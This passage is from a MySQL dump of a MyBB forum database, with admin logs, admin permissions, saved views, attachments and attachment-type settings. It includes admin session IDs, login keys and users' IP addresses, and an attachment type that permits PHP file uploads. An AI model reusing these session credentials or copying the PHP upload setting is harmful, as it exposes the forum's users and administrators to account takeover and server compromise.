(`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352681184', 'config-settings', 'change', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352761263', 'config-settings', 'change', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352784256', 'user-forcepwchange', '', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352784257', 'user-forcepwchange', 'forcepwchange_awaitingchange', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352785433', 'user-forcepwchange', '', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352785435', 'user-forcepwchange', 'forcepwchange_awaitingchange', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782976', 'user-forcepwchange', 'forcepwchange_forcegroup', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782978', 'user-forcepwchange', 'forcepwchange_awaitingchange', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352783093', 'user-users', 'edit', 'a:2:{i:0;s:1:\"1\";i:1;s:9:\"t3h jok3r\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352783952', 'config-settings', 'change', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782945', 'user-forcepwchange', '', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782948', 'user-forcepwchange', 'forcepwchange_forcegroup', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782975', 'user-forcepwchange', 'forcepwchange_do_force_group', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782931', 'config-plugins', 'activate', 'a:2:{i:0;s:13:\"forcepwchange\";i:1;b:1;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782345', 'config-plugins', 'deactivate', 'a:2:{i:0;s:9:\"hidelinks\";i:1;b:0;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782326', 'user-users', 'edit', 'a:2:{i:0;s:1:\"4\";i:1;s:8:\"Triple H\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352782294', 'tools-adminlog', 'prune', 'a:4:{i:0;s:1:\"0\";i:1;i:4;i:2;s:0:\"\";i:3;i:35;}'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_adminoptions`; CREATE TABLE `mybb_adminoptions` ( `uid` int(11) NOT NULL DEFAULT '0', `cpstyle` varchar(50) NOT NULL DEFAULT '', `codepress` int(1) NOT NULL DEFAULT '1', `notes` text NOT NULL, `permissions` text NOT NULL, `defaultviews` text NOT NULL, `loginattempts` int(10) unsigned NOT NULL DEFAULT '0', `loginlockoutexpiry` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`uid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_adminoptions` WRITE; INSERT INTO `mybb_adminoptions` (`uid`, `cpstyle`, `codepress`, `notes`, `permissions`, `defaultviews`, `loginattempts`, `loginlockoutexpiry`) VALUES ('0', '', '1', '', 'a:6:{s:6:\"config\";a:17:{s:3:\"tab\";s:1:\"0\";s:8:\"settings\";s:1:\"0\";s:7:\"banning\";s:1:\"0\";s:14:\"profile_fields\";s:1:\"0\";s:7:\"smilies\";s:1:\"0\";s:8:\"badwords\";s:1:\"0\";s:6:\"mycode\";s:1:\"0\";s:9:\"languages\";s:1:\"0\";s:10:\"post_icons\";s:1:\"0\";s:14:\"help_documents\";s:1:\"0\";s:7:\"plugins\";s:1:\"0\";s:16:\"attachment_types\";s:1:\"0\";s:9:\"mod_tools\";s:1:\"0\";s:7:\"spiders\";s:1:\"0\";s:9:\"calendars\";s:1:\"0\";s:7:\"warning\";s:1:\"0\";s:15:\"thread_prefixes\";s:1:\"0\";}s:5:\"forum\";a:5:{s:3:\"tab\";s:1:\"0\";s:10:\"management\";s:1:\"0\";s:13:\"announcements\";s:1:\"0\";s:16:\"moderation_queue\";s:1:\"0\";s:11:\"attachments\";s:1:\"0\";}s:5:\"style\";a:3:{s:3:\"tab\";s:1:\"0\";s:6:\"themes\";s:1:\"0\";s:9:\"templates\";s:1:\"0\";}s:5:\"tools\";a:19:{s:3:\"tab\";s:1:\"0\";s:13:\"system_health\";s:1:\"0\";s:5:\"cache\";s:1:\"0\";s:5:\"tasks\";s:1:\"0\";s:8:\"backupdb\";s:1:\"0\";s:10:\"optimizedb\";s:1:\"0\";s:8:\"adminlog\";s:1:\"0\";s:6:\"modlog\";s:1:\"0\";s:15:\"recount_rebuild\";s:1:\"0\";s:8:\"php_info\";s:1:\"1\";s:8:\"maillogs\";s:1:\"0\";s:10:\"mailerrors\";s:1:\"0\";s:10:\"warninglog\";s:1:\"0\";s:10:\"statistics\";s:1:\"0\";s:17:\"file_verification\";s:1:\"0\";s:6:\"ip_man\";i:0;s:3:\"pms\";i:0;s:10:\"sticky_man\";i:0;s:13:\"monthly_stats\";i:0;}s:4:\"user\";a:8:{s:3:\"tab\";s:1:\"0\";s:5:\"users\";s:1:\"0\";s:6:\"groups\";s:1:\"0\";s:6:\"titles\";s:1:\"0\";s:7:\"banning\";s:1:\"0\";s:17:\"admin_permissions\";s:1:\"0\";s:9:\"mass_mail\";s:1:\"0\";s:16:\"group_promotions\";s:1:\"0\";}s:11:\"achivements\";a:11:{i:1;i:0;s:5:\"posts\";i:0;s:7:\"threads\";i:0;s:10:\"reputation\";i:0;s:10:\"timeonline\";i:0;s:7:\"regdate\";i:0;s:6:\"custom\";i:0;s:11:\"achivements\";i:0;s:8:\"settings\";i:0;s:10:\"extensions\";i:0;s:6:\"config\";i:0;}}', 'a:1:{s:4:\"user\";s:1:\"1\";}', '0', '0'); INSERT INTO `mybb_adminoptions` (`uid`, `cpstyle`, `codepress`, `notes`, `permissions`, `defaultviews`, `loginattempts`, `loginlockoutexpiry`) VALUES ('-4', '', '1', '', 'a:5:{s:11:\"achivements\";a:10:{s:5:\"posts\";s:1:\"1\";s:7:\"threads\";s:1:\"1\";s:10:\"reputation\";s:1:\"1\";s:10:\"timeonline\";s:1:\"1\";s:7:\"regdate\";s:1:\"1\";s:6:\"custom\";s:1:\"1\";s:11:\"achivements\";s:1:\"1\";s:8:\"settings\";s:1:\"0\";s:10:\"extensions\";s:1:\"0\";s:6:\"config\";s:1:\"0\";}s:6:\"config\";a:16:{s:8:\"settings\";s:1:\"0\";s:7:\"banning\";s:1:\"1\";s:14:\"profile_fields\";s:1:\"1\";s:7:\"smilies\";s:1:\"1\";s:8:\"badwords\";s:1:\"1\";s:6:\"mycode\";s:1:\"1\";s:9:\"languages\";s:1:\"1\";s:10:\"post_icons\";s:1:\"1\";s:14:\"help_documents\";s:1:\"0\";s:7:\"plugins\";s:1:\"0\";s:16:\"attachment_types\";s:1:\"1\";s:7:\"spiders\";s:1:\"1\";s:9:\"calendars\";s:1:\"1\";s:7:\"warning\";s:1:\"0\";s:9:\"mod_tools\";s:1:\"0\";s:15:\"thread_prefixes\";s:1:\"1\";}s:5:\"forum\";a:5:{s:10:\"management\";s:1:\"0\";s:13:\"announcements\";s:1:\"1\";s:16:\"moderation_queue\";s:1:\"1\";s:11:\"attachments\";s:1:\"1\";s:7:\"tabmenu\";s:1:\"0\";}s:4:\"user\";a:8:{s:5:\"users\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:6:\"titles\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:17:\"admin_permissions\";s:1:\"0\";s:9:\"mass_mail\";s:1:\"0\";s:16:\"group_promotions\";s:1:\"1\";s:16:\"username_history\";s:1:\"1\";}s:5:\"tools\";a:18:{s:13:\"system_health\";s:1:\"0\";s:5:\"cache\";s:1:\"1\";s:5:\"tasks\";s:1:\"1\";s:8:\"backupdb\";s:1:\"1\";s:10:\"optimizedb\";s:1:\"0\";s:15:\"recount_rebuild\";s:1:\"1\";s:8:\"adminlog\";s:1:\"0\";s:6:\"modlog\";s:1:\"0\";s:8:\"maillogs\";s:1:\"1\";s:10:\"mailerrors\";s:1:\"1\";s:10:\"warninglog\";s:1:\"1\";s:8:\"php_info\";s:1:\"1\";s:17:\"file_verification\";s:1:\"1\";s:10:\"statistics\";s:1:\"1\";s:9:\"modreplog\";s:1:\"1\";s:3:\"pms\";s:1:\"0\";s:10:\"sticky_man\";s:1:\"0\";s:13:\"monthly_stats\";s:1:\"1\";}}', 'a:1:{s:4:\"user\";s:1:\"1\";}', '0', '0'); INSERT INTO `mybb_adminoptions` (`uid`, `cpstyle`, `codepress`, `notes`, `permissions`, `defaultviews`, `loginattempts`, `loginlockoutexpiry`) VALUES ('1', 'default', '1', '', 'a:6:{s:5:\"style\";a:2:{s:6:\"themes\";s:1:\"1\";s:9:\"templates\";s:1:\"1\";}s:5:\"tools\";a:19:{s:13:\"system_health\";s:1:\"1\";s:5:\"cache\";s:1:\"1\";s:5:\"tasks\";s:1:\"1\";s:8:\"backupdb\";s:1:\"1\";s:10:\"optimizedb\";s:1:\"1\";s:15:\"recount_rebuild\";s:1:\"1\";s:8:\"adminlog\";s:1:\"1\";s:6:\"modlog\";s:1:\"1\";s:8:\"maillogs\";s:1:\"1\";s:10:\"mailerrors\";s:1:\"1\";s:10:\"warninglog\";s:1:\"1\";s:8:\"php_info\";s:1:\"1\";s:17:\"file_verification\";s:1:\"1\";s:10:\"statistics\";s:1:\"1\";s:9:\"modreplog\";s:1:\"1\";s:6:\"ip_man\";s:1:\"1\";s:3:\"pms\";i:1;s:10:\"sticky_man\";i:1;s:13:\"monthly_stats\";i:1;}s:4:\"user\";a:10:{s:5:\"users\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:6:\"titles\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:17:\"admin_permissions\";s:1:\"1\";s:9:\"mass_mail\";s:1:\"1\";s:16:\"group_promotions\";s:1:\"1\";s:16:\"username_history\";s:1:\"1\";s:6:\"awards\";s:1:\"1\";s:10:\"iplhsearch\";s:1:\"1\";}s:6:\"config\";a:16:{s:8:\"settings\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:14:\"profile_fields\";s:1:\"1\";s:7:\"smilies\";s:1:\"1\";s:8:\"badwords\";s:1:\"1\";s:6:\"mycode\";s:1:\"1\";s:9:\"languages\";s:1:\"1\";s:10:\"post_icons\";s:1:\"1\";s:14:\"help_documents\";s:1:\"1\";s:7:\"plugins\";s:1:\"1\";s:16:\"attachment_types\";s:1:\"1\";s:7:\"spiders\";s:1:\"1\";s:9:\"calendars\";s:1:\"1\";s:7:\"warning\";s:1:\"1\";s:9:\"mod_tools\";s:1:\"1\";s:15:\"thread_prefixes\";s:1:\"1\";}s:5:\"forum\";a:5:{s:10:\"management\";s:1:\"1\";s:13:\"announcements\";s:1:\"1\";s:16:\"moderation_queue\";s:1:\"1\";s:11:\"attachments\";s:1:\"1\";s:7:\"tabmenu\";s:1:\"1\";}s:11:\"achivements\";a:11:{i:1;i:1;s:5:\"posts\";i:0;s:7:\"threads\";i:0;s:10:\"reputation\";i:0;s:10:\"timeonline\";i:0;s:7:\"regdate\";i:0;s:6:\"custom\";i:0;s:11:\"achivements\";i:0;s:8:\"settings\";i:0;s:10:\"extensions\";i:0;s:6:\"config\";i:0;}}', 'a:1:{s:4:\"user\";s:1:\"1\";}', '0', '0'); INSERT INTO `mybb_adminoptions` (`uid`, `cpstyle`, `codepress`, `notes`, `permissions`, `defaultviews`, `loginattempts`, `loginlockoutexpiry`) VALUES ('2', '', '1', '', 'a:5:{s:6:\"config\";a:16:{s:8:\"settings\";s:1:\"0\";s:7:\"banning\";s:1:\"1\";s:14:\"profile_fields\";s:1:\"1\";s:7:\"smilies\";s:1:\"1\";s:8:\"badwords\";s:1:\"1\";s:6:\"mycode\";s:1:\"1\";s:9:\"languages\";s:1:\"1\";s:10:\"post_icons\";s:1:\"1\";s:14:\"help_documents\";s:1:\"0\";s:7:\"plugins\";s:1:\"0\";s:16:\"attachment_types\";s:1:\"1\";s:7:\"spiders\";s:1:\"0\";s:9:\"calendars\";s:1:\"1\";s:7:\"warning\";s:1:\"1\";s:9:\"mod_tools\";s:1:\"1\";s:15:\"thread_prefixes\";s:1:\"1\";}s:5:\"forum\";a:5:{s:10:\"management\";s:1:\"0\";s:13:\"announcements\";s:1:\"1\";s:16:\"moderation_queue\";s:1:\"1\";s:11:\"attachments\";s:1:\"1\";s:7:\"tabmenu\";s:1:\"0\";}s:4:\"user\";a:8:{s:5:\"users\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:6:\"titles\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:17:\"admin_permissions\";s:1:\"0\";s:9:\"mass_mail\";s:1:\"0\";s:16:\"group_promotions\";s:1:\"0\";s:16:\"username_history\";s:1:\"1\";}s:5:\"tools\";a:19:{s:13:\"system_health\";s:1:\"0\";s:5:\"cache\";s:1:\"1\";s:5:\"tasks\";s:1:\"0\";s:8:\"backupdb\";s:1:\"1\";s:10:\"optimizedb\";s:1:\"0\";s:15:\"recount_rebuild\";s:1:\"1\";s:8:\"adminlog\";s:1:\"0\";s:6:\"modlog\";s:1:\"1\";s:8:\"maillogs\";s:1:\"0\";s:10:\"mailerrors\";s:1:\"0\";s:10:\"warninglog\";s:1:\"0\";s:8:\"php_info\";s:1:\"0\";s:17:\"file_verification\";s:1:\"1\";s:10:\"statistics\";s:1:\"1\";s:9:\"modreplog\";s:1:\"0\";s:6:\"ip_man\";s:1:\"1\";s:3:\"pms\";s:1:\"0\";s:10:\"sticky_man\";s:1:\"1\";s:13:\"monthly_stats\";s:1:\"1\";}s:11:\"achivements\";a:11:{i:1;i:1;s:5:\"posts\";i:0;s:7:\"threads\";i:0;s:10:\"reputation\";i:0;s:10:\"timeonline\";i:0;s:7:\"regdate\";i:0;s:6:\"custom\";i:0;s:11:\"achivements\";i:0;s:8:\"settings\";i:0;s:10:\"extensions\";i:0;s:6:\"config\";i:0;}}', '', '0', '0'); INSERT INTO `mybb_adminoptions` (`uid`, `cpstyle`, `codepress`, `notes`, `permissions`, `defaultviews`, `loginattempts`, `loginlockoutexpiry`) VALUES ('3', '', '1', '', 'a:5:{s:6:\"config\";a:16:{s:8:\"settings\";s:1:\"0\";s:7:\"banning\";s:1:\"1\";s:14:\"profile_fields\";s:1:\"1\";s:7:\"smilies\";s:1:\"1\";s:8:\"badwords\";s:1:\"1\";s:6:\"mycode\";s:1:\"1\";s:9:\"languages\";s:1:\"1\";s:10:\"post_icons\";s:1:\"1\";s:14:\"help_documents\";s:1:\"0\";s:7:\"plugins\";s:1:\"0\";s:16:\"attachment_types\";s:1:\"1\";s:7:\"spiders\";s:1:\"0\";s:9:\"calendars\";s:1:\"1\";s:7:\"warning\";s:1:\"0\";s:9:\"mod_tools\";s:1:\"1\";s:15:\"thread_prefixes\";s:1:\"1\";}s:5:\"forum\";a:5:{s:10:\"management\";s:1:\"1\";s:13:\"announcements\";s:1:\"1\";s:16:\"moderation_queue\";s:1:\"1\";s:11:\"attachments\";s:1:\"1\";s:7:\"tabmenu\";s:1:\"0\";}s:4:\"user\";a:10:{s:5:\"users\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:6:\"titles\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:17:\"admin_permissions\";s:1:\"0\";s:9:\"mass_mail\";s:1:\"0\";s:16:\"group_promotions\";s:1:\"1\";s:16:\"username_history\";s:1:\"1\";s:10:\"iplhsearch\";s:1:\"1\";s:6:\"awards\";s:1:\"1\";}s:5:\"tools\";a:19:{s:13:\"system_health\";s:1:\"0\";s:5:\"cache\";s:1:\"1\";s:5:\"tasks\";s:1:\"1\";s:8:\"backupdb\";s:1:\"1\";s:10:\"optimizedb\";s:1:\"0\";s:15:\"recount_rebuild\";s:1:\"1\";s:8:\"adminlog\";s:1:\"0\";s:6:\"modlog\";s:1:\"1\";s:8:\"maillogs\";s:1:\"1\";s:10:\"mailerrors\";s:1:\"1\";s:10:\"warninglog\";s:1:\"1\";s:8:\"php_info\";s:1:\"1\";s:17:\"file_verification\";s:1:\"1\";s:10:\"statistics\";s:1:\"1\";s:9:\"modreplog\";s:1:\"1\";s:6:\"ip_man\";s:1:\"1\";s:3:\"pms\";s:1:\"0\";s:10:\"sticky_man\";i:1;s:13:\"monthly_stats\";i:1;}s:11:\"achivements\";a:11:{i:1;i:1;s:5:\"posts\";i:0;s:7:\"threads\";i:0;s:10:\"reputation\";i:0;s:10:\"timeonline\";i:0;s:7:\"regdate\";i:0;s:6:\"custom\";i:0;s:11:\"achivements\";i:0;s:8:\"settings\";i:0;s:10:\"extensions\";i:0;s:6:\"config\";i:0;}}', '', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_adminsessions`; CREATE TABLE `mybb_adminsessions` ( `sid` varchar(32) NOT NULL DEFAULT '', `uid` int(10) unsigned NOT NULL DEFAULT '0', `loginkey` varchar(50) NOT NULL DEFAULT '', `ip` varchar(40) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', `lastactive` bigint(30) NOT NULL DEFAULT '0', `data` text NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_adminsessions` WRITE; INSERT INTO `mybb_adminsessions` (`sid`, `uid`, `loginkey`, `ip`, `dateline`, `lastactive`, `data`) VALUES ('4dea451034dd40e8cb266c49b2563268', '3', 'MTgggloPAgqnmZ5JNgs62tdnqMx2QaS8ic5Oo2pwZeLZluHmoI', '75.22.59.132', '1341359104', '1341362283', 'a:1:{s:14:\"last_users_url\";s:33:\"index.php?module=user-users&vid=1\";}'); INSERT INTO `mybb_adminsessions` (`sid`, `uid`, `loginkey`, `ip`, `dateline`, `lastactive`, `data`) VALUES ('da263013b5b7a0e99a50631ff16b0dcd', '2', 'fTBop9sPxqN95Fbl7Wg9Wpcf4PeEywi5LAaiheJJkmRXkh4IJd', '173.206.128.176', '1346105164', '1346105182', 'a:2:{s:14:\"last_users_url\";s:33:\"index.php?module=user-users&vid=1\";s:13:\"flash_message\";s:0:\"\";}'); INSERT INTO `mybb_adminsessions` (`sid`, `uid`, `loginkey`, `ip`, `dateline`, `lastactive`, `data`) VALUES ('577032859df5f4a9a1736252cbc91e58', '61', 'ed5iZlX7yxl5z75EbTuczHcYHkfgwY2ZGwC5NzmheMygCkIAun', '99.252.235.12', '1352328141', '1352328243', 'a:1:{s:13:\"flash_message\";s:0:\"\";}'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_adminviews`; CREATE TABLE `mybb_adminviews` ( `vid` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL DEFAULT '0', `title` varchar(100) NOT NULL DEFAULT '', `type` varchar(6) NOT NULL DEFAULT '', `visibility` int(1) NOT NULL DEFAULT '0', `fields` text NOT NULL, `conditions` text NOT NULL, `custom_profile_fields` text NOT NULL, `sortby` varchar(20) NOT NULL DEFAULT '', `sortorder` varchar(4) NOT NULL DEFAULT '', `perpage` int(4) NOT NULL DEFAULT '0', `view_type` varchar(6) NOT NULL DEFAULT '', PRIMARY KEY (`vid`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_adminviews` WRITE; INSERT INTO `mybb_adminviews` (`vid`, `uid`, `title`, `type`, `visibility`, `fields`, `conditions`, `custom_profile_fields`, `sortby`, `sortorder`, `perpage`, `view_type`) VALUES ('1', '0', 'All Users', 'user', '2', 'a:7:{i:0;s:6:\"avatar\";i:1;s:8:\"username\";i:2;s:5:\"email\";i:3;s:7:\"regdate\";i:4;s:10:\"lastactive\";i:5;s:7:\"postnum\";i:6;s:8:\"controls\";}', 'a:0:{}', 'a:0:{}', 'username', 'asc', '20', 'card'); INSERT INTO `mybb_adminviews` (`vid`, `uid`, `title`, `type`, `visibility`, `fields`, `conditions`, `custom_profile_fields`, `sortby`, `sortorder`, `perpage`, `view_type`) VALUES ('3', '1', 'Spam Finder:Signature', 'user', '1', 'a:7:{i:0;s:8:\"username\";i:1;s:5:\"email\";i:2;s:9:\"usergroup\";i:3;s:7:\"regdate\";i:4;s:10:\"lastactive\";i:5;s:5:\"regip\";i:6;s:8:\"controls\";}', 'a:16:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:7:\"website\";s:0:\"\";s:3:\"icq\";s:0:\"\";s:3:\"aim\";s:0:\"\";s:5:\"yahoo\";s:0:\"\";s:3:\"msn\";s:0:\"\";s:9:\"signature\";s:4:\"www.\";s:15:\"signature_blank\";s:1:\"1\";s:9:\"usertitle\";s:0:\"\";s:11:\"postnum_dir\";s:9:\"less_than\";s:7:\"postnum\";s:2:\"10\";s:7:\"regdate\";s:2:\"20\";s:5:\"regip\";s:0:\"\";s:6:\"lastip\";s:0:\"\";s:6:\"postip\";s:0:\"\";}', 'N;', 'username', 'asc', '20', 'card'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_announcements`; CREATE TABLE `mybb_announcements` ( `aid` int(10) unsigned NOT NULL AUTO_INCREMENT, `fid` int(10) NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `subject` varchar(120) NOT NULL DEFAULT '', `message` text NOT NULL, `startdate` bigint(30) NOT NULL DEFAULT '0', `enddate` bigint(30) NOT NULL DEFAULT '0', `allowhtml` int(1) NOT NULL DEFAULT '0', `allowmycode` int(1) NOT NULL DEFAULT '0', `allowsmilies` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`aid`), KEY `fid` (`fid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_announcements` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_attachments`; CREATE TABLE `mybb_attachments` ( `aid` int(10) unsigned NOT NULL AUTO_INCREMENT, `pid` int(10) NOT NULL DEFAULT '0', `posthash` varchar(50) NOT NULL DEFAULT '', `uid` int(10) unsigned NOT NULL DEFAULT '0', `filename` varchar(120) NOT NULL DEFAULT '', `filetype` varchar(120) NOT NULL DEFAULT '', `filesize` int(10) NOT NULL DEFAULT '0', `attachname` varchar(120) NOT NULL DEFAULT '', `downloads` int(10) unsigned NOT NULL DEFAULT '0', `dateuploaded` bigint(30) NOT NULL DEFAULT '0', `visible` int(1) NOT NULL DEFAULT '0', `thumbnail` varchar(120) NOT NULL DEFAULT '', PRIMARY KEY (`aid`), KEY `posthash` (`posthash`), KEY `pid` (`pid`,`visible`), KEY `uid` (`uid`) ) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_attachments` WRITE; INSERT INTO `mybb_attachments` (`aid`, `pid`, `posthash`, `uid`, `filename`, `filetype`, `filesize`, `attachname`, `downloads`, `dateuploaded`, `visible`, `thumbnail`) VALUES ('6', '6584', '94880396c0b9044bf17b68680f5897f4', '67', 'Anonymous Hedgehog.png', 'image/png', '277957', '201210/post_67_1351506643_8d449d6f85660540a0135e528539675f.attach', '3', '1351506643', '1', '201210/post_67_1351506643_8d449d6f85660540a0135e528539675f_thumb.png'); INSERT INTO `mybb_attachments` (`aid`, `pid`, `posthash`, `uid`, `filename`, `filetype`, `filesize`, `attachname`, `downloads`, `dateuploaded`, `visible`, `thumbnail`) VALUES ('7', '7084', 'f278b6d354bbfb2a83a3a5c1e0f61ba8', '1', 'l33t.png', 'image/png', '12645', '201211/post_1_1352195786_628205bb331e276a506e2eed76ac1f9e.attach', '10', '1352195786', '1', '201211/post_1_1352195786_628205bb331e276a506e2eed76ac1f9e_thumb.png'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_attachtypes`; CREATE TABLE `mybb_attachtypes` ( `atid` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(120) NOT NULL DEFAULT '', `mimetype` varchar(120) NOT NULL DEFAULT '', `extension` varchar(10) NOT NULL DEFAULT '', `maxsize` int(15) NOT NULL DEFAULT '0', `icon` varchar(100) NOT NULL DEFAULT '', PRIMARY KEY (`atid`) ) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_attachtypes` WRITE; INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('1', 'ZIP File', 'application/zip', 'zip', '1024', 'images/attachtypes/zip.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('2', 'JPG Image', 'image/jpeg', 'jpg', '500', 'images/attachtypes/image.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('3', 'Text Document', 'text/plain', 'txt', '200', 'images/attachtypes/txt.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('4', 'GIF Image', 'image/gif', 'gif', '500', 'images/attachtypes/image.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('6', 'PHP File', 'application/x-httpd-php', 'php', '500', 'images/attachtypes/php.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('7', 'PNG Image', 'image/png', 'png', '500', 'images/attachtypes/image.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('8', 'Microsoft Word Document', 'application/msword', 'doc', '1024', 'images/attachtypes/doc.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('9', 'HTM File', 'text/html', 'htm', '100', 'images/attachtypes/html.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('10', 'HTML File', 'text/html', 'html', '100', 'images/attachtypes/html.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('11', 'JPEG Image', 'image/jpeg', 'jpeg', '500', 'images/attachtypes/image.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('12', 'GZIP Compressed File', 'application/x-gzip', 'gz', '1024', 'images/attachtypes/tar.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('13', 'TAR Compressed File', 'application/x-tar', 'tar', '1024', 'images/attachtypes/tar.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('14', 'CSS Stylesheet', 'text/css', 'css', '100', 'images/attachtypes/css.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('15', 'Adobe Acrobat PDF', 'application/pdf', 'pdf', '2048', 'images/attachtypes/pdf.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('16', 'Bitmap Image', 'image/bmp', 'bmp', '500', 'images/attachtypes/image.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('17', 'Microsoft Word 2007 Document', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'docx', '1024', 'images/attachtypes/doc.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('18', 'Microsoft Excel Document', 'application/vnd.ms-excel', 'xls', '1024', 'images/attachtypes/xls.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('19', 'Microsoft Excel 2007 Document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'xlsx', '1024', 'images/attachtypes/xls.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('20', 'Microsoft PowerPoint Document', 'application/vnd.ms-powerpoint', 'ppt', '1024', 'images/attachtypes/ppt.gif'); INSERT INTO `mybb_attachtypes` (`atid`, `name`, `mimetype`, `extension`, `maxsize`, `icon`) VALUES ('21', 'Microsoft PowerPoint 2007 Document', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 